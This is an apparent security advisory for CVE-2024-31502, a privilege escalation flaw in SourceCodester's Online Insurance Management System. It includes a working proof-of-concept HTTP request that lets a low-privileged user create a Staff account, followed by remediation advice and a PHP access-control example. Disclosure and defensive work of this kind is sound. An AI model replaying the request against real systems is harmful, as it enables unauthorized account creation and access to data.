CVE-2024-31502.md

File metadata and controls

80 lines (51 loc) · 3.8 KB

Privilege Escalation Vulnerability in SourceCodester Online Insurance Management System

Vendor and Product Information:

Executive Summary

A vertical privilege escalation vulnerability in Insurance Management System 1.0 and earlier allows an attacker holding a low-privileged User account to create a higher-privileged Staff account by invoking a function that lies outside the access scope of his role. Since the attacker controls the resulting Staff account, he can then perform tasks he is not supposed to be able to perform.

Issue Details

Issue Description

The web application is vulnerable to a vertical privilege escalation attack in the "add new staff" functionality. An attacker can exploit this vulnerability by creating a higher-privileged Staff account. In the example provided below, the attacker creates a new Staff account by calling a function that is outside his access privileges.

Proof Of Concept

  1. Configure a web proxy in your browser.
  2. With a User role privilege account, intercept any request in the web proxy, change the Request Method from GET to POST, change the path to /e-insurance/Script./admin/core/new_staff, and set the POST data to fname=Privilege&lname=Escalation&email=hackerookie%40hackerookie.com&gender=Male&phone=9999999999&submit=1.
  3. Send the request. The page will display an error, because it tries to render the admin page, which is not available to this user, but the Staff user is nevertheless created successfully.
  4. You can verify this in the admin account by navigating to the Staff section.

https://drive.google.com/file/d/1mzj80LmcBK0dFAY8xzwI-yfj8wxFqrnb/view?usp=sharing

Payload:

fname=Privilege&lname=Escalation&email=hackerookie%40hackerookie.com&gender=Male&phone=9999999999&submit=1

Request:

POST /e-insurance/Script./admin/core/new_staff HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 106

fname=Privilege&lname=Escalation&email=hackerookie%40hackerookie.com&gender=Male&phone=9999999999&submit=1

Impact:

Privilege escalation compromises data security by giving the attacker less-restricted or unrestricted access. The sensitive information they access can be used for whatever purposes legitimate users might use it.

Remediation:

Access control vulnerabilities can be prevented by taking a defense-in-depth approach and applying the following principles:

  • Never rely on obfuscation alone for access control.
  • Unless a resource is intended to be publicly accessible, deny access by default.
  • Wherever possible, use a single application-wide mechanism for enforcing access controls.
  • At the code level, make it mandatory for developers to declare the access that is allowed for each resource, and deny access by default.
  • Thoroughly audit and test access controls to ensure they work as designed.
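The following is an added example, not code from the Insurance Management System, illustrating the principles above for the new_staff action: a single application-wide allow-list of routes and roles, consulted before any form data is read, that denies by default and logs every refusal. The route keys, $_SESSION['role'], the $pdo connection and the staff table name are assumptions.

```php
<?php
// Added example (not the project's code). Assumed names: $_SESSION['role'],
// the route keys in ROUTE_ROLES, a PDO connection in $pdo, table 'staff'.
declare(strict_types=1);
// Central allow-list: an action must be declared here to be reachable at all.
const ROUTE_ROLES = [
    'admin/core/new_staff'  => ['admin'],
    'admin/core/staff_list' => ['admin'],
    'user/core/policies'    => ['admin', 'staff', 'user'],
];
function is_authorized(?string $role, string $route): bool
{
    // Unknown route or no session role: denied, whatever the HTTP method.
    if ($role === null || !array_key_exists($route, ROUTE_ROLES)) {
        return false;
    }
    return in_array($role, ROUTE_ROLES[$route], true);
}
function require_role(string $route): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $role = $_SESSION['role'] ?? null;
    if (!is_authorized($role, $route)) {
        // Log the denial: repeated hits from a 'user' role on admin routes
        // are the detection signal for the escalation attempt in this report.
        error_log(sprintf('authz denied role=%s route=%s method=%s ip=%s',
            $role ?? 'anonymous', $route, $_SERVER['REQUEST_METHOD'] ?? '-',
            $_SERVER['REMOTE_ADDR'] ?? '-'));
        http_response_code(403);
        exit('Forbidden');
    }
}
// new_staff.php: the guard runs before any form field is read, so switching
// GET to POST and supplying the right field names no longer creates a user.
require_role('admin/core/new_staff');
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    $stmt = $pdo->prepare(
        'INSERT INTO staff (fname, lname, email, gender, phone) VALUES (?, ?, ?, ?, ?)');
    $stmt->execute([
        trim($_POST['fname'] ?? ''), trim($_POST['lname'] ?? ''),
        trim($_POST['email'] ?? ''), trim($_POST['gender'] ?? ''),
        trim($_POST['phone'] ?? ''),
    ]);
}
```

Because the check is keyed on the route rather than on which page links to it, a User-role session replaying the request from the proof of concept receives a 403 and an "authz denied" log line instead of a new Staff record.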

References:

https://portswigger.net/web-security/access-control

Weakness Enumeration:

CWE-269


This report highlights the Privilege Escalation vulnerability present in the new_staff.php function of http://localhost/e-insurance/Script./admin/core/new_staff, including the Proof of Concept, its impact, remediation steps and references for further guidance on mitigation strategies.